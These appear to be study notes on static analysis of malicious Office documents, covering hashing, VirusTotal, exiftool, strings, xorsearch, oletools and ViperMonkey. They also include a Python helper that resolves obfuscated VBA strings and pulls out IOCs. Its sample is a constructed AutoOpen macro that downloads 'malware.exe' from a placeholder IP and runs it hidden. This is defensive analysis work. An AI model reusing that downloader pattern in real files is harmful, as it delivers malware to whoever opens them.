# Introduction

# Static Analysis

1. Unzip the malware sample.
2. `md5sum <docname>`
3. `sha256sum <docname>`
4. Submit one of the hashes to VirusTotal:
   1. Rescan if the cached result is too old.
   2. Check the logged file names under Details.
   3. Relations:
      1. Contacted IP addresses
      2. Bundled files
      3. Dropped files
   4. Behavior:
      1. DNS resolutions
      2. IP traffic
      3. Registry keys set
      4. Spawned processes
5. `exiftool <docname>`
   1. File name
   2. Modification date/time
   3. Permissions
   4. File type/extension
   5. Language code (a different language than expected?)
   6. Template (`.dotm` means a macro-enabled template)
   7. Heading pairs (a different language than expected?)
6. `strings -n 5 <docname>` (prints printable strings of at least 5 characters); look for:
   1. IP addresses
   2. Websites
   3. Domains
   4. File locations (e.g. the temp directory)
   5. Malicious files
   6. Malicious code
      1. x64
      2. Visual Basic (VB): this means macros are included; look for `AutoOpen`
7. `xorsearch <docname> <string>`, where the string is something like `http`, `url`, etc. XORSearch also finds the string when it is hidden under XOR, ROL or ROT encoding, which plain `strings` misses.
8. `xorsearch -p <docname>` searches for embedded executables (PE files).

# Details

`strings <docname> | grep -iE 'http|vbs'` (the `http` pattern also covers `https`; note that `grep https http vbs` would treat `http` and `vbs` as file names, not patterns)

`olemeta <docname>` (https://github.com/decalage2/oletools/wiki/olemeta) parses MS Office documents like Word and Excel and extracts their standard metadata properties (author, creation/modification times, application).

`oleid <docname>` (https://github.com/decalage2/oletools/wiki/oleid) reports the following indicators:
- File format
- Container format
- Application name
- Properties code page
- Encrypted
- **VBA macros**
- XLM macros
- External relationships

`olevba <docname>` extracts the macros and scans them for suspicious keywords.

# Details 2

`olevba <docname.doc> > <docname.vba>`
- Open the output with Visual Studio Code (or another IDE that can highlight VBA).

`olevba --deobf --reveal <docname.vba> > <docname_deobf.vba>` (the flag is `--deobf`, not `--debof`)
- Deobfuscates the Visual Basic code and otherwise makes it readable: `--deobf` attempts to decode obfuscated strings and `--reveal` prints the source with the decoded strings substituted in.

If you find nonsensical strings, find every other instance of them in the document to see whether they are assigned a value.
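A worked example of that lookup, added here as illustration (it is not code from these notes, oletools or ViperMonkey): it walks the assignments in a deobfuscated VBA listing in source order, evaluates the string-building tricks olevba's `--deobf` typically leaves behind (literals joined with `&`, `Chr()`, `StrReverse()`, `Environ()`), and then runs the same IOC sweep the `strings` step does over the resolved values. The VBA sample and the variable names in it are constructed for the example; `203.0.113.45` is a documentation address, not a real indicator.

```python
"""Resolve obfuscated VBA string variables and pull IOCs: an added example for these
notes, not code from oletools or ViperMonkey. Straight-line assignments only."""
import re

# Constructed sample of already-deobfuscated VBA (not from a real document).
SAMPLE_VBA = r'''
Dim qa49ouihwjkg As String
Dim zzx11 As String
Private Sub AutoOpen()
    qa49ouihwjkg = "htt" & "p://" & "203.0.113.45"
    qa49ouihwjkg = qa49ouihwjkg & "/dir" & Chr(47) & "malware.exe"
    zzx11 = Environ("TEMP") & "\" & StrReverse("exe.etadpu")
    Call URLDownloadToFile(0, qa49ouihwjkg, zzx11, 0, 0)
    Shell zzx11, vbHide
End Sub
'''

ASSIGN_RE = re.compile(r'^\s*(?:Set\s+|Const\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
SKIP_RE = re.compile(r'^\s*(?:If|ElseIf|While|Do|For|Dim|Call)\b', re.I)
CHR_RE = re.compile(r'^ChrW?\(\s*(\d+)\s*\)$', re.I)
FUNC_RE = re.compile(r'^(StrReverse|Environ)\((.*)\)$', re.I)
COMMENT_RE = re.compile(r'''^((?:[^"']|"[^"]*")*)'.*$''')  # ' comment outside quotes
IOC_PATTERNS = {
    'urls': re.compile(r'https?://[^\s"\'<>)]+', re.I),
    'ips': re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b'),
    'paths': re.compile(r'(?:%[A-Za-z_]+%|[A-Za-z]:)\\[^\s"\'<>]*'),
}
# Keywords the strings/olevba sweep in the notes above looks for.
SUSPICIOUS = ['AutoOpen', 'Document_Open', 'Workbook_Open', 'Shell',
              'URLDownloadToFile', 'CreateObject', 'Environ', 'powershell']


def split_concat(expr):
    """Split on '&' operators that sit outside string literals and parentheses."""
    parts, buf, in_str, depth = [], [], False, 0
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch in '()':
            depth += 1 if ch == '(' else -1
        if ch == '&' and not in_str and depth == 0:
            parts.append(''.join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append(''.join(buf).strip())
    return [p for p in parts if p]


def resolve_expr(expr, env):
    """Evaluate a VBA string expression against already-resolved variables."""
    out = []
    for tok in split_concat(expr):
        chr_m, fn_m = CHR_RE.match(tok), FUNC_RE.match(tok)
        if len(tok) >= 2 and tok[0] == tok[-1] == '"':
            out.append(tok[1:-1].replace('""', '"'))  # "" is an escaped quote
        elif chr_m:
            out.append(chr(int(chr_m.group(1))))
        elif fn_m and fn_m.group(1).lower() == 'strreverse':
            out.append(resolve_expr(fn_m.group(2), env)[::-1])
        elif fn_m:  # Environ("TEMP") is shown as the placeholder %TEMP%
            out.append('%' + resolve_expr(fn_m.group(2), env) + '%')
        elif tok in env:
            out.append(env[tok])
        else:
            out.append('<' + tok + '>')  # unresolved call, constant or unknown name
    return ''.join(out)


def resolve_variables(vba_text):
    """Walk assignments in source order so 'x = x & "..."' accumulates as at runtime."""
    env = {}
    for line in vba_text.splitlines():
        line = COMMENT_RE.sub(r'\1', line)
        if SKIP_RE.match(line):
            continue
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = resolve_expr(m.group(2), env)
    return env


def extract_iocs(text):
    """The strings/keyword sweep from the notes, over source plus resolved values."""
    found = {kind: sorted(set(pat.findall(text))) for kind, pat in IOC_PATTERNS.items()}
    found['keywords'] = sorted(kw for kw in SUSPICIOUS if re.search(r'\b%s\b' % kw, text, re.I))
    return found


def triage(vba_text):
    """Return (resolved variables, IOCs) for one deobfuscated VBA listing."""
    env = resolve_variables(vba_text)
    return env, extract_iocs(vba_text + '\n' + '\n'.join(env.values()))


if __name__ == '__main__':
    variables, iocs = triage(SAMPLE_VBA)
    print(variables)
    print(iocs)
```

Running `triage(SAMPLE_VBA)` resolves `qa49ouihwjkg` to the full download URL and `zzx11` to the drop path under `%TEMP%`, neither of which appears whole in the source, which is why a `strings` pass over the document alone would miss them. Anything the resolver cannot evaluate is left as `<token>` rather than guessed, so you can see exactly where emulation with `vmonkey` is still needed (loops, branches and real function calls are out of scope here).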
Such nonsensical names are typically variables, for example: `qa49ouihwjkg = maliciousip/directory/malware.exe`.

https://github.com/decalage2/ViperMonkey

`vmonkey <baddoc.vba>`
- Before running this, remove anything from the file that is not Visual Basic code (olevba's banner and separator lines, for instance).
- Parses and emulates the Visual Basic, describing the actions it performs.

`vmonkey --iocs <baddoc.vba>` also reports the potential IOCs found during emulation.

# Sandbox Analysis